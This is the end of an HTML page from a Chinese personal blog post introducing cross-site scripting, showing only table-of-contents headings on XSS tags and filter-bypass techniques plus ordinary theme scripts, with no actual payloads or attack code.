href="#0x13-details%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.13.</span> <span class="toc-text">0x13. details标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x14"><span class="toc-number">1.3.1.14.</span> <span class="toc-text">0x14. &lt;select 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x15"><span class="toc-number">1.3.1.15.</span> <span class="toc-text">0x15. &lt;form 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x16"><span class="toc-number">1.3.1.16.</span> <span class="toc-text">0x16.  &lt;body标签</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B8%B8%E7%94%A8%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB"><span class="toc-number">1.3.2.</span> <span class="toc-text">2.常用绕过姿势汇总</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E5%85%B3%E9%94%AE%E8%AF%8D%E7%BD%AE%E7%A9%BA%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">1.关键词置空绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#0x01-%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.1.1.</span> <span class="toc-text">0x01. 大小写绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x02-%E5%B5%8C%E5%A5%97%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.1.2.</span> <span class="toc-text">0x02. 嵌套绕过</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">2.编码绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-html-%E5%AE%9E%E4%BD%93%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.2.2.1.</span> <span class="toc-text">1. html 实体编码</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-url-%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.2.2.2.</span> <span class="toc-text">2. url 编码</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-js%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.2.2.3.</span> <span class="toc-text">3.js编码</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.3.</span> <span class="toc-text">3.空格过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-%E5%9C%86%E6%8B%AC%E5%8F%B7%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.4.</span> <span class="toc-text">4.圆括号过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-alert-%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.5.</span> <span class="toc-text">5.alert 过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-%E5%87%BD%E6%95%B0%E6%8B%BC%E6%8E%A5%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.6.</span> <span class="toc-text">6.函数拼接绕过</span></a></li></ol></li></ol></li></ol></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Cl1ck-t0" class="lazyload">
  <div class="sidebar-author-name">Cl1ck-t0</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">12</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">19</div>
  </div>
</div>
<div class="sidebar-social" >
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-link">Home</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-link">Archives</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-link">About</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
        <div class="sidebar-menu-link">Friend</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/js/script.js"></script>


  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/js/pjax_script.js" data-pjax></script>




  <script>
    var setupFirework = () => {
      if (!false || !window.matchMedia('(max-width: 768px)').matches) {
        window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
      }
    }
  </script>
  
<script src="https://npm.webcache.cn/mouse-firework@0.2.0/dist/index.umd.js" integrity="sha384-qi9WggRt19tv8Vc7pCHW3ulMNLwrn515zaLEWZjl1px07vz8+pUoWX8n1rgq282T" crossorigin="anonymous" onload="setupFirework()" defer></script>





  
<script src="https://npm.webcache.cn/quicklink@3.0.1/dist/quicklink.umd.js" integrity="sha384-caMDqvgav&#x2F;HWdEYQU1QRRHMLleigpL1YHAG0m371DhzfL8rRzUyOb+bEHtwlmYjD" crossorigin="anonymous"></script>

  <script data-pjax>
    window.quicklink?.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>

<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "Cl1ck-t0",
          title: "xss基础",
          url: "https://cl1ck-t0.github.io/2025/11/23/xss%E5%9F%BA%E7%A1%80/",
          excerpt: "",
          description: "",
          stripContent: "xss基础一.xss概述1.定义：XSS（Cross Site Scripting）攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。 成因：XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植 入到提供给其它用户使用的页面中，而程序对输入和输出的控制不够严格，导致“精心构造” 的脚本输入后，再输到前端时被浏览器当作有效代码解析执行从而产生危害。当受害者访问 这些页面时，浏览器",
          date: "Sun Nov 23 2025 23:30:36 GMT+0800",
          updated: "Sun Jan 04 2026 22:07:10 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
        
<script src="/js/insert_highlight.js" data-pjax></script>

      
<script src="/js/tabs.js" data-pjax defer></script>

        
<script src="https://npm.webcache.cn/@zumer/snapdom@1.9.14/dist/snapdom.min.js" integrity="sha384-OEQ+fJp&#x2F;Mvi2uzBREXybtxryJvLytWapuHu4EE6LPwTKUwATYcc55tPPcZTzVcmx" crossorigin="anonymous" defer data-pjax></script>

        
<script src="https://npm.webcache.cn/qrcode@1.5.1/build/qrcode.js" integrity="sha384-VT1EeewTCEXgndcPMQ0PzV+uVFYjxFIjmAA7s5gcMX9t4Dt5TD+OVQIn7NJWIXn7" crossorigin="anonymous" defer data-pjax></script>

      <script type="module" data-pjax>
        (async () => {
          const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
          const initPswp = (gallery, children) => {
            if (_$$(`${gallery} ${children}`).length > 0) {
              new PhotoSwipeLightbox({
                gallery,
                children,
                pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
              }).init();
            }
          }
          const pswp = () => {
            initPswp('.article-entry', 'a.article-gallery-item');
            initPswp('.article-gallery', 'a.article-gallery-item');
          }
          pswp();
        })();
      </script>
        

<script data-pjax>
  var loadScript = (src, integrity) => {
    const script = document.createElement('script');
    script.src = src;
    if (integrity) script.integrity = integrity;
    script.crossOrigin = 'anonymous';
    return script;
  };

  var commentConfigKeys = ["utterances"];
  var commentConfig = {
    utterances: {
      enable: true,
      load: () => {
        const container = document.querySelector('.utterances-comment'); 
        if (!container) return;
        container.style.display = 'block';

        let theme = 'auto';
        const parsedTheme = theme === 'auto' ? (document.documentElement.getAttribute('data-theme') === 'dark' ? 'github-dark' : 'github-light') : theme;

        // 创建 utterances 脚本
        const script = document.createElement('script');
        script.src = 'https://utteranc.es/client.js';
        script.setAttribute('repo', 'Cl1ck-t0/Cl1ck-t0.github.io');
        script.setAttribute('issue-term', 'title');
        script.setAttribute('theme', parsedTheme);
        script.setAttribute('crossorigin', 'anonymous');
        script.async = true;

        // 清空容器（防止重复加载）并插入脚本
        container.innerHTML = '';
        container.appendChild(script);
        if (theme === 'auto') {
          const themeHandler = (e) => {
            const iframe = container.querySelector('iframe.utterances-frame');
            if (!iframe || !iframe.contentWindow) {
              document.body.removeEventListener('reimu:theme-set', themeHandler);
              return;
            }
            iframe.contentWindow.postMessage({ type: 'set-theme', theme: e.detail.isDark ? 'github-dark' : 'github-light' }, 'https://utteranc.es');
          };
          document.body.addEventListener('reimu:theme-set', themeHandler);
        }
      }
    },
  }
  commentConfig.enable = commentConfigKeys.some(key => commentConfig[key].enable);

  var defaultComment = '';
  if (commentConfig.enable) {
    // 1. 首先检查localStorage中是否有保存的评论类型
    var savedCommentType = localStorage.getItem('commentType');
    
    // 2. 如果localStorage中有值且对应的评论系统可用，就使用它
    if (savedCommentType) {
      if (commentConfig[savedCommentType]?.enable) {
        defaultComment = savedCommentType;
      }
    }
    
    // 3. 如果localStorage无效，检查配置的默认评论系统
    if (!defaultComment) {
      var configDefault = 'waline';
      if (commentConfig[configDefault]?.enable) {
        defaultComment = configDefault;
      }
    }
    
    // 4. 如果前两项都无效，按指定顺序找到第一个可用的评论系统
    if (!defaultComment) {
      defaultComment = commentConfigKeys.find(sys => commentConfig[sys].enable) || '';
    }
  }
  function loadComments() {
    if (!commentConfig.enable) return;
    const loadedComments = {
      valine: false,
      waline: false,
      twikoo: false,
      gitalk: false,
      giscus: false
    };

    // 隐藏所有评论容器
    const hideAllComments = () => {
      const commentContainers = document.querySelectorAll('.comment');
      commentContainers.forEach(container => {
        container.style.display = 'none';
      });
    };

    // 按需加载评论系统
    const loadCommentSystem = (type) => {
      if (loadedComments[type]) {
        // 如果已加载，只需显示对应容器
        document.querySelector(`.${type}-comment`).style.display = 'block';
        return;
      }

      // 根据类型加载对应的脚本
      commentConfig[type]?.load();
      loadedComments[type] = true;
    };

    // 评论组件选择器
    const changeActiveCommentItems = (item) => {
      const commentItems = document.querySelectorAll('.selector-item');
      for (let i = 0; i < commentItems.length; i++) {
        commentItems[i].classList.remove('active');
      }
      item.classList.add('active');

      // 获取要加载的评论系统类型
      const commentType = item.getAttribute('data-selector');

      // 隐藏所有评论系统
      hideAllComments();

      // 加载选中的评论系统
      loadCommentSystem(commentType);
    };

    const commentInit = () => {
      // 评论组件选择器点击事件
      const commentItems = document.querySelectorAll('.selector-item');
      for (let item of commentItems) {
        item.addEventListener('click', () => {
          // 保存选择器状态
          const commentType = item.getAttribute('data-selector');
          window.localStorage.setItem('commentType', commentType);
          // 切换选中状态
          changeActiveCommentItems(item);
        });
      }

      // 检查是否需要加载默认评论系统
      if (defaultComment) {
        const defaultSelectorItem = document.querySelector(`[data-selector="${defaultComment}"]`);
        if (!defaultSelectorItem) return;
        defaultSelectorItem.style.display = 'block';
        defaultSelectorItem.classList.add('active');
        loadCommentSystem(defaultComment);
      }
    }

    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', commentInit);
    } else {
      commentInit();
    }
  };
  loadComments();
</script>

  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.12.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>




  </body>
  </html>
